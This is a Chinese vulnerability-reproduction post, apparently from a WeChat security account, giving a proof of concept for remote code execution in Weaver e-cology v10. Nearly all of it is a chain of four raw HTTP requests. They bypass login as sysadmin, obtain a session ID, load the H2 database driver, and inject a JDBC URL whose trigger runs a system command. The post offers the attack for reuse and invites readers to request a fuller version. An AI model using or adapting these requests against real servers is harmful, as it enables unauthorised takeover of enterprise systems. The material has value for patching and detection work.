(关注公众号,私信【20240821】即可获取完整POC)
Poc 第一步: POST /papi/passport/rest/appThirdLogin HTTP/1.1 Host:x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 51 username=sysadmin&service=1&ip=1&loginType=third 第二步: POST /papi/passport/login/generateEteamsId HTTP/1.1 Host:x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 56 stTicket=第一步返回的serviceTicketId值 第三步:加载数据库驱动类 POST /api/bs/iaauthclient/base/save HTTP/1.1 Host:x.x.x.x Content-Length: 86 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: application/json Accept: */* Origin: http://ip Referer: http://ip/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ETEAMSID: 第二步返回的data值 {"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}} 第四步: POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1 Host:x.x.x.x Content-Length: 199 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: application/json Accept: */* Origin: http://ip Referer: http://ip/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ETEAMSID: 返回的data值 {"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\njava.lang.Runtime.getRuntime().exec(\"id\")$$"}
原文始发于微信公众号(白帽攻防):【漏洞复现】泛微 e-cology v10 远程代码执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论